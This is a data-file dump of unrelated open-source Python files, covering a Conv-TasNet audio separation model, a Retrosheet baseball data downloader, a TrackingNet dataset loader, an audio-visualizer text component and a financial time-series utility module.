+{"seq_id":"30643248468","text":"#!/usr/bin/env python3\n# This module is taken from: https://github.com/JusperLee/Conv-TasNet/blob/master/Conv_TasNet_Pytorch/Conv_TasNet.py\n\nimport torch\n\nDEFAULT_CONV_TASNET_CONF = {\n    \"num_filters\": 512,\n    \"filter_length\": 16,\n    \"bottleneck_channels\": 128,\n    \"conv_channels\": 512,\n    \"kernel_size\": 3,\n    \"num_blocks\": 8,\n    \"num_layers\": 3,\n}\n\n\nclass ConvTasNet(torch.nn.Module):\n    \"\"\"\n    Conv-TasNet model\n    \"\"\"\n\n    @staticmethod\n    def add_args(parser):\n        parser.add_argument(\"--num-spk\", type=int, default=2)\n        parser.add_argument(\"--num-noise\", type=int, default=1)\n        parser.add_argument(\"--conv-tasnet-num-filters\", type=int, default=256)\n        parser.add_argument(\"--conv-tasnet-filter-length\", type=int, default=16)\n        parser.add_argument(\"--conv-tasnet-bottleneck-channels\", type=int, default=128)\n        parser.add_argument(\"--conv-tasnet-conv-channels\", type=int, default=256)\n        parser.add_argument(\"--conv-tasnet-kernel-size\", type=int, default=3)\n        parser.add_argument(\"--conv-tasnet-num-blocks\", type=int, default=8)\n        parser.add_argument(\"--conv-tasnet-num-layers\", type=int, default=3)\n        parser.add_argument(\n            \"--conv-tasnet-norm\", type=str, default=\"gln\", choices=[\"gln\", \"cln\", \"bn\"]\n        )\n\n    @classmethod\n    def build_model(cls, conf):\n        conv_tasnet_conf = {\n            \"num_filters\": int(conf[\"conv_tasnet_num_filters\"]),\n            \"filter_length\": int(conf[\"conv_tasnet_filter_length\"]),\n            \"bottleneck_channels\": int(conf[\"conv_tasnet_bottleneck_channels\"]),\n            \"conv_channels\": int(conf[\"conv_tasnet_conv_channels\"]),\n            \"kernel_size\": int(conf[\"conv_tasnet_kernel_size\"]),\n            \"num_blocks\": int(conf[\"conv_tasnet_num_blocks\"]),\n            \"num_layers\": int(conf[\"conv_tasnet_num_layers\"]),\n            \"norm\": conf[\"conv_tasnet_norm\"],\n        }\n        model = ConvTasNet(\n            num_spk=conf[\"num_spk\"],\n            num_noise=conf[\"num_noise\"],\n            
conv_tasnet_conf=conv_tasnet_conf,\n )\n return model\n\n def __init__(\n self,\n num_spk=2,\n num_noise=1,\n conv_tasnet_conf=DEFAULT_CONV_TASNET_CONF,\n activate=\"relu\",\n causal=False,\n ):\n N = conv_tasnet_conf[\"num_filters\"]\n L = conv_tasnet_conf[\"filter_length\"]\n B = conv_tasnet_conf[\"bottleneck_channels\"]\n H = conv_tasnet_conf[\"conv_channels\"]\n P = conv_tasnet_conf[\"kernel_size\"]\n X = conv_tasnet_conf[\"num_blocks\"]\n R = conv_tasnet_conf[\"num_layers\"]\n norm = conv_tasnet_conf[\"norm\"]\n\n super(ConvTasNet, self).__init__()\n # n x 1 x T => n x N x T\n self.encoder = Conv1D(1, N, L, stride=L // 2, padding=0)\n # n x N x T Layer Normalization of Separation\n self.LayerN_S = select_norm(\"cln\", N)\n # n x B x T Conv 1 x 1 of Separation\n self.BottleN_S = Conv1D(N, B, 1)\n # Separation block\n # n x B x T => n x B x T\n self.separation = self._Sequential_repeat(\n R, X, in_channels=B, out_channels=H, kernel_size=P, norm=norm, causal=causal\n )\n # n x B x T => n x 2*N x T\n self.gen_masks = Conv1D(B, (num_spk + num_noise) * N, 1)\n # n x N x T => n x 1 x L\n self.decoder = ConvTrans1D(N, 1, L, stride=L // 2)\n # activation function\n active_f = {\n \"relu\": torch.nn.ReLU(),\n \"sigmoid\": torch.nn.Sigmoid(),\n \"softmax\": torch.nn.Softmax(dim=0),\n }\n self.activation_type = activate\n self.activation = active_f[activate]\n self.num_spk = num_spk\n self.num_noise = num_noise\n\n def _Sequential_block(self, num_blocks, **block_kwargs):\n \"\"\"\n Sequential 1-D Conv Block\n input:\n num_block: how many blocks in every repeats\n **block_kwargs: parameters of Conv1D_Block\n \"\"\"\n Conv1D_Block_lists = [\n Conv1D_Block(**block_kwargs, dilation=(2 ** i)) for i in range(num_blocks)\n ]\n\n return torch.nn.Sequential(*Conv1D_Block_lists)\n\n def _Sequential_repeat(self, num_repeats, num_blocks, **block_kwargs):\n \"\"\"\n Sequential repeats\n input:\n num_repeats: Number of repeats\n num_blocks: Number of block in every repeats\n **block_kwargs: parameters of Conv1D_Block\n \"\"\"\n repeats_lists = [\n self._Sequential_block(num_blocks, **block_kwargs)\n for i in range(num_repeats)\n ]\n return torch.nn.Sequential(*repeats_lists)\n\n def forward(self, x):\n if x.dim() >= 3:\n raise RuntimeError(\n \"{} accept 1/2D tensor as input, but got {:d}\".format(\n self.__name__, x.dim()\n )\n )\n if x.dim() == 1:\n x = torch.unsqueeze(x, 0)\n # x: n x 1 x L => n x N x T\n w = self.encoder(x)\n # n x N x L => n x B x L\n e = self.LayerN_S(w)\n e = self.BottleN_S(e)\n # n x B x L => n x B x L\n e = self.separation(e)\n # n x B x L => n x (num_spk+num_noise)*N x L\n m = self.gen_masks(e)\n # n x N x L x num_spks\n m = torch.chunk(m, chunks=self.num_spk + self.num_noise, dim=1)\n # (num_spks + num_noise) x n x N x L\n m = self.activation(torch.stack(m, dim=0))\n d = [w * m[i] for i in range(self.num_spk + self.num_noise)]\n # decoder part (num_spks + num_noise) x n x L\n s = [\n self.decoder(d[i], squeeze=True)\n for i in range(self.num_spk + self.num_noise)\n ]\n return torch.stack(s[:-1], dim=1)\n\n\nclass GlobalLayerNorm(torch.nn.Module):\n \"\"\"\n Calculate Global Layer Normalization\n dim: (int or list or torch.Size) –\n input shape from an expected input of size\n eps: a value added to the denominator for numerical stability.\n elementwise_affine: a boolean value that when set to True,\n this module has learnable per-element affine parameters\n initialized to ones (for weights) and zeros (for biases).\n \"\"\"\n\n def __init__(self, dim, eps=1e-05, 
elementwise_affine=True):\n super(GlobalLayerNorm, self).__init__()\n self.dim = dim\n self.eps = eps\n self.elementwise_affine = elementwise_affine\n\n if self.elementwise_affine:\n self.weight = torch.nn.Parameter(torch.ones(self.dim, 1))\n self.bias = torch.nn.Parameter(torch.zeros(self.dim, 1))\n else:\n self.register_parameter(\"weight\", None)\n self.register_parameter(\"bias\", None)\n\n def forward(self, x):\n # x = N x C x L\n # N x 1 x 1\n # cln: mean,var N x 1 x L\n # gln: mean,var N x 1 x 1\n if x.dim() != 3:\n raise RuntimeError(\"{} accept 3D tensor as input\".format(self.__name__))\n\n mean = torch.mean(x, (1, 2), keepdim=True)\n var = torch.mean((x - mean) ** 2, (1, 2), keepdim=True)\n # N x C x L\n if self.elementwise_affine:\n x = self.weight * (x - mean) / torch.sqrt(var + self.eps) + self.bias\n else:\n x = (x - mean) / torch.sqrt(var + self.eps)\n return x\n\n\nclass CumulativeLayerNorm(torch.nn.LayerNorm):\n \"\"\"\n Calculate Cumulative Layer Normalization\n dim: you want to norm dim\n elementwise_affine: learnable per-element affine parameters\n \"\"\"\n\n def __init__(self, dim, elementwise_affine=True):\n super(CumulativeLayerNorm, self).__init__(\n dim, elementwise_affine=elementwise_affine\n )\n\n def forward(self, x):\n # x: N x C x L\n # N x L x C\n x = torch.transpose(x, 1, 2)\n # N x L x C == only channel norm\n x = super().forward(x)\n # N x C x L\n x = torch.transpose(x, 1, 2)\n return x\n\n\ndef select_norm(norm, dim):\n if norm == \"gln\":\n return GlobalLayerNorm(dim, elementwise_affine=True)\n if norm == \"cln\":\n return CumulativeLayerNorm(dim, elementwise_affine=True)\n elif norm == \"bn\":\n return torch.nn.BatchNorm1d(dim)\n else:\n raise ValueError(\"Unknown normalization: {}\".format(norm))\n\n\nclass Conv1D(torch.nn.Conv1d):\n \"\"\"\n Applies a 1D convolution over an input signal composed of several input planes.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(Conv1D, self).__init__(*args, **kwargs)\n\n def forward(self, x, squeeze=False):\n # x: N x C x L\n if x.dim() not in [2, 3]:\n raise RuntimeError(\"{} accept 2/3D tensor as input\".format(self.__name__))\n x = super().forward(x if x.dim() == 3 else torch.unsqueeze(x, 1))\n if squeeze:\n x = torch.squeeze(x)\n return x\n\n\nclass ConvTrans1D(torch.nn.ConvTranspose1d):\n \"\"\"\n This module can be seen as the gradient of Conv1d with respect to its input.\n It is also known as a fractionally-strided convolution\n or a deconvolution (although it is not an actual deconvolution operation).\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(ConvTrans1D, self).__init__(*args, **kwargs)\n\n def forward(self, x, squeeze=False):\n \"\"\"\n x: N x L or N x C x L\n \"\"\"\n if x.dim() not in [2, 3]:\n raise RuntimeError(\"{} accept 2/3D tensor as input\".format(self.__name__))\n x = super().forward(x if x.dim() == 3 else torch.unsqueeze(x, 1))\n if squeeze:\n x = torch.squeeze(x)\n return x\n\n\nclass Conv1D_Block(torch.nn.Module):\n \"\"\"\n Consider only residual links\n \"\"\"\n\n def __init__(\n self,\n in_channels=256,\n out_channels=512,\n kernel_size=3,\n dilation=1,\n norm=\"gln\",\n causal=False,\n ):\n super(Conv1D_Block, self).__init__()\n # conv 1 x 1\n self.conv1x1 = Conv1D(in_channels, out_channels, 1)\n self.PReLU_1 = torch.nn.PReLU()\n self.norm_1 = select_norm(norm, out_channels)\n # not causal don't need to padding, causal need to pad+1 = kernel_size\n self.pad = (\n (dilation * (kernel_size - 1)) // 2\n if not causal\n else (dilation * (kernel_size - 1))\n )\n # 
depthwise convolution\n self.dwconv = Conv1D(\n out_channels,\n out_channels,\n kernel_size,\n groups=out_channels,\n padding=self.pad,\n dilation=dilation,\n )\n self.PReLU_2 = torch.nn.PReLU()\n self.norm_2 = select_norm(norm, out_channels)\n self.Sc_conv = torch.nn.Conv1d(out_channels, in_channels, 1, bias=True)\n self.causal = causal\n\n def forward(self, x):\n # x: N x C x L\n # N x O_C x L\n c = self.conv1x1(x)\n # N x O_C x L\n c = self.PReLU_1(c)\n c = self.norm_1(c)\n # causal: N x O_C x (L+pad)\n # noncausal: N x O_C x L\n c = self.dwconv(c)\n # N x O_C x L\n if self.causal:\n c = c[:, :, : -self.pad]\n c = self.PReLU_2(c)\n c = self.norm_2(c)\n c = self.Sc_conv(c)\n return x + c\n","repo_name":"desh2608/css","sub_path":"css/models/conv_tasnet.py","file_name":"conv_tasnet.py","file_ext":"py","file_size_in_byte":11150,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"22"} +{"seq_id":"21147499960","text":"import io\nimport logging\nimport requests\nimport zipfile\n\nfrom glob import glob\nfrom typing import List\n\n\nlogger = logging.getLogger(__name__)\n\nlogging.basicConfig(\n format='%(asctime)s | %(name)s | %(levelname)s | %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n level=logging.INFO,\n)\n\n\ndef get_retrosheet_events(\n years: List[int], data_dir: str\n ) -> List[str]:\n \n for year in years:\n url = f\"https://www.retrosheet.org/events/{year}eve.zip\"\n logger.info(f\"fetching data from {url}, saving to {data_dir}\")\n \n r = requests.get(url)\n z = zipfile.ZipFile(io.BytesIO(r.content))\n z.extractall(f\"{data_dir}/retrosheet\")\n\n data_paths = f\"{data_dir}/retrosheet/*.EV*\"\n\n retrosheet_events = []\n for data_path in glob(data_paths):\n retrosheet_events += open(data_path, \"r\").read().splitlines()\n\n return retrosheet_events\n\n\nif __name__ == \"__main__\":\n get_retrosheet_events([2020], \"/Users/timhealz/code/data\")","repo_name":"timhealz/retrosheet-processor","sub_path":"retrosheet-processor/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"25570852576","text":"import os\nimport numpy as np\nimport pandas as pd\nimport path_config\nfrom datasets.data import Sequence, BaseDataset, SequenceList\n\n\ndef load_text_numpy(path, delimiter, dtype):\n if isinstance(delimiter, (tuple, list)):\n for d in delimiter:\n try:\n ground_truth_rect = np.loadtxt(path, delimiter=d, dtype=dtype)\n return ground_truth_rect\n except Exception:\n pass\n\n raise Exception(\"Could not read file {}\".format(path))\n else:\n ground_truth_rect = np.loadtxt(path, delimiter=delimiter, dtype=dtype)\n return ground_truth_rect\n\n\ndef load_text_pandas(path, delimiter, dtype):\n if isinstance(delimiter, (tuple, list)):\n for d in delimiter:\n try:\n ground_truth_rect = pd.read_csv(\n path,\n delimiter=d,\n header=None,\n dtype=dtype,\n na_filter=False,\n low_memory=False,\n ).values\n return ground_truth_rect\n except Exception:\n pass\n\n raise Exception(\"Could not read file {}\".format(path))\n else:\n ground_truth_rect = pd.read_csv(\n path,\n delimiter=delimiter,\n header=None,\n dtype=dtype,\n na_filter=False,\n low_memory=False,\n ).values\n return ground_truth_rect\n\n\ndef load_text(path, delimiter=\" \", dtype=np.float32, backend=\"numpy\"):\n if backend == \"numpy\":\n return load_text_numpy(path, delimiter, dtype)\n elif backend == \"pandas\":\n return load_text_pandas(path, delimiter, 
dtype)\n\n\ndef TrackingNetDataset():\n return TrackingNetClass().get_sequence_list()\n\n\nclass TrackingNetClass(BaseDataset):\n \"\"\" TrackingNet test set.\n\n Publication:\n TrackingNet: A Large-Scale Dataset and Benchmark for Object Tracking in the Wild.\n Matthias Mueller,Adel Bibi, Silvio Giancola, Salman Al-Subaihi and Bernard Ghanem\n ECCV, 2018\n https://ivul.kaust.edu.sa/Documents/Publications/2018/TrackingNet%20A%20Large%20Scale%20Dataset%20and%20Benchmark%20for%20Object%20Tracking%20in%20the%20Wild.pdf\n\n Download the dataset using the toolkit https://github.com/SilvioGiancola/TrackingNet-devkit.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.base_path = path_config.TRACKINGNET_PATH\n\n sets = \"TEST\"\n if not isinstance(sets, (list, tuple)):\n if sets == \"TEST\":\n sets = [\"TEST\"]\n elif sets == \"TRAIN\":\n sets = [\"TRAIN_{}\".format(i) for i in range(5)]\n\n self.sequence_list = self._list_sequences(self.base_path, sets)\n\n def get_sequence_list(self):\n return SequenceList(\n [\n self._construct_sequence(set, seq_name)\n for set, seq_name in self.sequence_list\n ]\n )\n\n def _construct_sequence(self, set, sequence_name):\n anno_path = \"{}/{}/anno/{}.txt\".format(self.base_path, set, sequence_name)\n\n ground_truth_rect = load_text(\n str(anno_path), delimiter=\",\", dtype=np.float64, backend=\"numpy\"\n )\n\n frames_path = \"{}/{}/frames/{}\".format(self.base_path, set, sequence_name)\n frame_list = [\n frame for frame in os.listdir(frames_path) if frame.endswith(\".jpg\")\n ]\n frame_list.sort(key=lambda f: int(f[:-4]))\n frames_list = [os.path.join(frames_path, frame) for frame in frame_list]\n\n return Sequence(\n sequence_name, frames_list, \"trackingnet\", ground_truth_rect.reshape(-1, 4)\n )\n\n def __len__(self):\n return len(self.sequence_list)\n\n def _list_sequences(self, root, set_ids):\n sequence_list = []\n\n for s in set_ids:\n anno_dir = os.path.join(root, s, \"anno\")\n sequences_cur_set = [\n (s, os.path.splitext(f)[0])\n for f in os.listdir(anno_dir)\n if f.endswith(\".txt\")\n ]\n\n sequence_list += sequences_cur_set\n\n return sequence_list\n","repo_name":"songheony/A3T","sub_path":"datasets/trackingnetdataset.py","file_name":"trackingnetdataset.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"22"} +{"seq_id":"43983665771","text":"from PIL import ImageEnhance, ImageFilter, ImageChops\nfrom PyQt5.QtGui import QColor, QFont\nfrom PyQt5 import QtGui, QtCore, QtWidgets\nimport os\nimport logging\n\nfrom ..component import Component\nfrom ..toolkit.frame import FramePainter, PaintColor\n\nlog = logging.getLogger('AVP.Components.Text')\n\n\nclass Component(Component):\n name = 'Title Text'\n version = '1.0.1'\n\n def widget(self, *args):\n super().widget(*args)\n self.title = 'Text'\n self.alignment = 1\n self.titleFont = QFont()\n self.fontSize = self.height / 13.5\n\n self.page.comboBox_textAlign.addItem(\"Left\")\n self.page.comboBox_textAlign.addItem(\"Middle\")\n self.page.comboBox_textAlign.addItem(\"Right\")\n self.page.comboBox_textAlign.setCurrentIndex(int(self.alignment))\n self.page.spinBox_fontSize.setValue(int(self.fontSize))\n self.page.lineEdit_title.setText(self.title)\n self.page.pushButton_center.clicked.connect(self.centerXY)\n\n self.page.fontComboBox_titleFont.currentFontChanged.connect(self._sendUpdateSignal)\n # The QFontComboBox must be connected directly to the Qt Signal\n # which triggers the preview to update.\n # This 
unfortunately makes changing the font into a non-undoable action.\n # Must be something broken in the conversion to a ComponentAction\n\n self.trackWidgets({\n 'textColor': self.page.lineEdit_textColor,\n 'title': self.page.lineEdit_title,\n 'alignment': self.page.comboBox_textAlign,\n 'fontSize': self.page.spinBox_fontSize,\n 'xPosition': self.page.spinBox_xTextAlign,\n 'yPosition': self.page.spinBox_yTextAlign,\n 'fontStyle': self.page.comboBox_fontStyle,\n 'stroke': self.page.spinBox_stroke,\n 'strokeColor': self.page.lineEdit_strokeColor,\n 'shadow': self.page.checkBox_shadow,\n 'shadX': self.page.spinBox_shadX,\n 'shadY': self.page.spinBox_shadY,\n 'shadBlur': self.page.spinBox_shadBlur,\n }, colorWidgets={\n 'textColor': self.page.pushButton_textColor,\n 'strokeColor': self.page.pushButton_strokeColor,\n }, relativeWidgets=[\n 'xPosition', 'yPosition', 'fontSize',\n 'stroke', 'shadX', 'shadY', 'shadBlur'\n ])\n self.centerXY()\n\n def update(self):\n self.titleFont = self.page.fontComboBox_titleFont.currentFont()\n if self.page.checkBox_shadow.isChecked():\n self.page.label_shadX.setHidden(False)\n self.page.spinBox_shadX.setHidden(False)\n self.page.spinBox_shadY.setHidden(False)\n self.page.label_shadBlur.setHidden(False)\n self.page.spinBox_shadBlur.setHidden(False)\n else:\n self.page.label_shadX.setHidden(True)\n self.page.spinBox_shadX.setHidden(True)\n self.page.spinBox_shadY.setHidden(True)\n self.page.label_shadBlur.setHidden(True)\n self.page.spinBox_shadBlur.setHidden(True)\n\n def centerXY(self):\n self.setRelativeWidget('xPosition', 0.5)\n self.setRelativeWidget('yPosition', 0.521)\n\n def getXY(self):\n '''Returns true x, y after considering alignment settings'''\n fm = QtGui.QFontMetrics(self.titleFont)\n x = self.pixelValForAttr('xPosition')\n\n if self.alignment == 1: # Middle\n offset = int(fm.width(self.title)/2)\n x -= offset\n if self.alignment == 2: # Right\n offset = fm.width(self.title)\n x -= offset\n\n return x, self.yPosition\n\n def loadPreset(self, pr, *args):\n super().loadPreset(pr, *args)\n\n font = QFont()\n font.fromString(pr['titleFont'])\n self.page.fontComboBox_titleFont.setCurrentFont(font)\n\n def savePreset(self):\n saveValueStore = super().savePreset()\n saveValueStore['titleFont'] = self.titleFont.toString()\n return saveValueStore\n\n def previewRender(self):\n return self.addText(self.width, self.height)\n\n def properties(self):\n props = ['static']\n if not self.title:\n props.append('error')\n return props\n\n def error(self):\n return \"No text provided.\"\n\n def frameRender(self, frameNo):\n return self.addText(self.width, self.height)\n\n def addText(self, width, height):\n font = self.titleFont\n font.setPixelSize(self.fontSize)\n font.setStyle(QFont.StyleNormal)\n font.setWeight(QFont.Normal)\n font.setCapitalization(QFont.MixedCase)\n if self.fontStyle == 1:\n font.setWeight(QFont.DemiBold)\n if self.fontStyle == 2:\n font.setWeight(QFont.Bold)\n elif self.fontStyle == 3:\n font.setStyle(QFont.StyleItalic)\n elif self.fontStyle == 4:\n font.setWeight(QFont.Bold)\n font.setStyle(QFont.StyleItalic)\n elif self.fontStyle == 5:\n font.setStyle(QFont.StyleOblique)\n elif self.fontStyle == 6:\n font.setCapitalization(QFont.SmallCaps)\n\n image = FramePainter(width, height)\n x, y = self.getXY()\n log.debug('Text position translates to %s, %s', x, y)\n if self.stroke > 0:\n outliner = QtGui.QPainterPathStroker()\n outliner.setWidth(self.stroke)\n path = QtGui.QPainterPath()\n if self.fontStyle == 6:\n # PathStroker ignores smallcaps so 
we need this weird hack\n                path.addText(x, y, font, self.title[0])\n                fm = QtGui.QFontMetrics(font)\n                newX = x + fm.width(self.title[0])\n                strokeFont = self.page.fontComboBox_titleFont.currentFont()\n                strokeFont.setCapitalization(QFont.SmallCaps)\n                strokeFont.setPixelSize(int((self.fontSize / 7) * 5))\n                strokeFont.setLetterSpacing(QFont.PercentageSpacing, 139)\n                path.addText(newX, y, strokeFont, self.title[1:])\n            else:\n                path.addText(x, y, font, self.title)\n            path = outliner.createStroke(path)\n            image.setPen(QtCore.Qt.NoPen)\n            image.setBrush(PaintColor(*self.strokeColor))\n            image.drawPath(path)\n\n        image.setFont(font)\n        image.setPen(self.textColor)\n        image.drawText(x, y, self.title)\n\n        # turn QImage into Pillow frame\n        frame = image.finalize()\n        if self.shadow:\n            shadImg = ImageEnhance.Contrast(frame).enhance(0.0)\n            shadImg = shadImg.filter(ImageFilter.GaussianBlur(self.shadBlur))\n            shadImg = ImageChops.offset(shadImg, self.shadX, self.shadY)\n            shadImg.paste(frame, box=(0, 0), mask=frame)\n            frame = shadImg\n\n        return frame\n\n    def commandHelp(self):\n        print('Enter a string to use as centred white text:')\n        print('    \"title=User Error\"')\n        print('Specify a text color:\\n    color=255,255,255')\n        print('Set custom x, y position:\\n    x=500 y=500')\n\n    def command(self, arg):\n        if '=' in arg:\n            key, arg = arg.split('=', 1)\n            if key == 'color':\n                self.page.lineEdit_textColor.setText(arg)\n                return\n            elif key == 'size':\n                self.page.spinBox_fontSize.setValue(int(arg))\n                return\n            elif key == 'x':\n                self.page.spinBox_xTextAlign.setValue(int(arg))\n                return\n            elif key == 'y':\n                self.page.spinBox_yTextAlign.setValue(int(arg))\n                return\n            elif key == 'title':\n                self.page.lineEdit_title.setText(arg)\n                return\n        super().command(arg)\n","repo_name":"djfun/audio-visualizer-python","sub_path":"src/components/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":7754,"program_lang":"python","lang":"en","doc_type":"code","stars":223,"dataset":"github-code","pt":"22"}
+{"seq_id":"12048830514","text":"# -*- coding: utf-8 -*-\n#import matplotlib\n\n###### IMPORTANT !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! \n## If we ever return some self.XXXX, return a copy.deepcopy()\nimport numpy as np\nimport copy\nimport time\nimport pandas as pd\nimport graph_lib as gr\nimport Intraday_lib as itd\nimport utilities_lib as ul\nimport indicators_lib as indl\nimport get_data_lib as gdl \nimport basicMathlib as bMl\n\nimport datetime as dt\nfrom datetime import datetime\n\n\"\"\"\nLibrary with all the functions for obtaining market indicators.\n\n\"\"\"\n\n# Start Date is the date from which we return the data.\n# The data returned should be returned after this date.\n\n# TimeSeries is the main data we have to care about. 
\n# All the operations will be done over this one\n\ndef set_period (self, period):\n    # Sets the period date in minutes\n    self.period = period   \n    \ndef get_period (self):\n    return copy.deepcopy(self.period);\n\ndef set_seriesNames(self, seriesNames = []):\n    if (seriesNames == []):\n        seriesNames = [\"Close\"]\n        \n    self.seriesNames = seriesNames;\n    self.timeSeries = [];\n    \ndef get_seriesNames(self):\n    return copy.deepcopy(self.seriesNames);\n\ndef set_interval(self,start_time = [], end_time = []):\n    \n    if (len(self.TD) != 0): # If the csv is not empty we fill it with the max\n        if (start_time == []):\n            self.start_time = self.TD.index[0]\n        if (end_time == []):\n            self.end_time = self.TD.index[-1]  \n            \n    if (start_time != []):\n        self.start_time = start_time\n    if (end_time != []):\n        self.end_time = end_time\n    \n    ## If both start and end are set we then calculate the mask !!!\n    if ((self.start_time != [])& (self.end_time != [])):\n        dates = self.TD.index\n        self.time_mask = (dates >= self.start_time) & (dates <= self.end_time)\n        \n#        print len(dates)\n#        print len(self.time_mask)\n\ndef get_timeSeries(self, seriesNames = [], transform = \"none\"):\n    # The final timeSeries will be [Nsamples][Nsec]\n    # TODO : Make it possible to add other names that will be a function of the original prices\n    # Pass transform=\"log\" to obtain the log of the prices\n    \n    if (seriesNames != []):  # If we indicate a new type of seriesNames\n        self.set_seriesNames(seriesNames)\n    \n    timeSeries = []\n    for name in self.seriesNames:\n        if (name == \"Average\"):\n            timeSeries.append(np.mean(self.TD[[\"Low\",\"High\",\"Close\",\"Open\"]], axis = 1))\n            \n        elif(name == \"RangeHL\"): # Difference Between High and Low\n            Range = np.array(self.TD[\"High\"][:] - self.TD[\"Low\"][:])\n            timeSeries.append(Range)\n            \n        elif(name == \"RangeCO\"): # Difference between Close and Open\n            Range = self.TD[\"Close\"][:] - self.TD[\"Open\"][:]\n            timeSeries.append(Range)\n        \n        elif(name == \"magicDelta\"): # Difference between Close and Open\n            magicDelta = self.get_magicDelta()\n            timeSeries.append(magicDelta)\n            \n        else:\n            timeSeries.append(self.TD[name])\n    \n    timeSeries = np.array(timeSeries).T;  # timeSeries[Nvalues][Ntimes]\n    dates = self.TD.index\n\n#    print timeSeries.shape\n    self.timeSeries = timeSeries[self.time_mask,:] # Price List we are operating with timeSeries[Nvalues][Ndates]\n    # TODO if we convert dates to np.array it converts dt.datetime to np.datetime64\n    self.dates = dates[self.time_mask]   # Dates we are operating with  \n#    print timeSeries.shape\n    if (transform == \"log\"):\n        self.timeSeries = np.log(self.timeSeries)\n        \n    return copy.deepcopy(self.timeSeries)\n\ndef get_dates(self):\n    # Gets the dates vector, if we don't have it, we create it\n#    if (len(self.dates) == 0):  # Check existence of timeSeries\n    dates = self.TD.index[self.time_mask]\n    self.dates = dates\n    return copy.deepcopy(self.dates)\n\n\ndef get_timeSeriesReturn(self, transform = \"none\"):\n    # Gets the Return of the Time Series, if it has not been created yet, then it creates it\n   # if (self.timeSeries == []):  # Check existence of timeSeries\n    # We will try as well to get the return of the first datapoint\n    # if we actually have it in the database. 
For this, we check our mask.\n    # If the first \"1\" found is not at 0, we can do this\n    \n    self.get_timeSeries(transform = \"none\") # fetch the raw prices; log is applied below if requested\n    \n    pos1 = (self.time_mask).tolist().index(1)\n\n    if (pos1 > 0):  # If we actually have more signal.\n        ps = self.TD[self.seriesNames].iloc[pos1-1]\n        ps = np.array(ps).T\n        ps = ps.reshape(ps.size//len(self.seriesNames), len(self.seriesNames))\n#        print ps\n#        print self.timeSeries.shape\n#        print ps.shape\n        self.timeSeriesReturn = bMl.get_return(np.concatenate((ps,self.timeSeries),axis =0))\n        self.timeSeriesReturn = self.timeSeriesReturn[1:,:]\n    else:\n        self.timeSeriesReturn = bMl.get_return(self.timeSeries)\n    \n    if (transform == \"log\"):\n        ## We take log(1 + returns) to obtain the log returns\n        self.timeSeriesReturn = np.log(self.timeSeriesReturn + 1)\n        \n    return copy.deepcopy(self.timeSeriesReturn)\n\ndef get_timeSeriesCumReturn(self):\n    # Gets the Return of the Time Series, if it has not been created yet, then it creates it\n    #if (self.timeSeries == []):  # Check existence of timeSeries\n    self.get_timeSeries()\n    \n    self.timeSeriesCumReturn = bMl.get_cumReturn(self.timeSeries)\n    return copy.deepcopy(self.timeSeriesCumReturn)\n\n# The rest of the functions suppose that the timeSeries has been created.\n#### GET ONLY DAILY DATA\n\ndef get_SortinoR(self):\n   # if (self.timeSeriesReturn == []):\n    self.get_timeSeriesReturn();\n    \n    SortinoR = ul.get_SortinoR(self.timeSeriesReturn)\n    \n    return SortinoR;\n    \ndef get_SharpR(self):\n   # if (self.timeSeriesReturn == []):\n    self.get_timeSeriesReturn();\n    \n    self.SharpR = ul.get_SharpR(self.timeSeriesReturn)\n    return copy.deepcopy(self.SharpR)\n    \n##################################################################\n###################### DIFFERENCES DATA ######################\n##################################################################\n\"\"\" Here we define other time series obtained from linear operations\nover the basic ones\"\"\"\n\ndef get_magicDelta(self):\n    # Difference between the open of one day and the close of the preceding day\n    closePrev = self.TD[\"Close\"].values\n    openCurr = self.TD[\"Open\"].values\n\n    magicDelta = np.array(openCurr[1:] - closePrev[:-1])\n    magicDelta = np.concatenate(([0],magicDelta), axis = 0)\n#    print magicDelta\n#    print len(openCurr[1:])\n#    print (magicDelta.shape)\n    \n    return magicDelta\n\ndef get_diffPrevCloseCurrMax(self):\n    \n    # Difference between the previous close and the current day's high\n    PrevClose = self.TD[\"Close\"].values\n    CurrMax = self.TD[\"High\"].values\n\n    diffPrevCloseCurrMax = np.array(PrevClose[1:] - CurrMax[:-1]).reshape((len(PrevClose)-1,1))\n    zero_vec = np.zeros((1,1))  # Add zero vector\n    diffPrevCloseCurrMax = np.concatenate((zero_vec,diffPrevCloseCurrMax), axis = 0)\n    \n    return copy.deepcopy(diffPrevCloseCurrMax[self.time_mask,:])\n\ndef get_diffPrevCloseCurrMin(self):\n    \n    # Difference between the previous close and the current day's low\n    PrevClose = self.TD[\"Close\"].values\n    CurrMin = self.TD[\"Low\"].values\n\n#    print len(PrevClose)\n    diffPrevCloseCurrMin = np.array(PrevClose[1:] - CurrMin[:-1]).reshape((len(PrevClose)-1,1))\n    zero_vec = np.zeros((1,1))  # Add zero vector\n#    print diffPrevCloseCurrMin.shape\n    diffPrevCloseCurrMin = np.concatenate((zero_vec,diffPrevCloseCurrMin), axis = 0)\n    \n    return copy.deepcopy(diffPrevCloseCurrMin[self.time_mask,:])\n    \n#### GET the time series divided in days #####\ndef get_intra_by_days(self):\n    if (self.timeSeries == []):  # Check existence of timeSeries\n        
self.get_timeSeries()\n    \n    days_list_price = [];\n    days_list_dates = [];\n    \n    price = self.timeSeries\n    dates = self.dates\n\n#    print type(dates[0])\n    days_dates = ul.get_dates(dates)\n    diff_days = np.unique(days_dates)\n    \n    for day_i in range (len(diff_days)):\n        \n        day_intra_indx = (days_dates == diff_days[day_i])\n        day_intra_price = price[day_intra_indx,:]\n        day_intra_date = dates[day_intra_indx]\n        \n        days_list_price.append(day_intra_price)\n        days_list_dates.append(day_intra_date)\n        \n    return days_list_price, days_list_dates\n    \n","repo_name":"manuwhs/Financial-Engineering-DTU","sub_path":"code/CTimeData/TimeData_core.py","file_name":"TimeData_core.py","file_ext":"py","file_size_in_byte":8576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
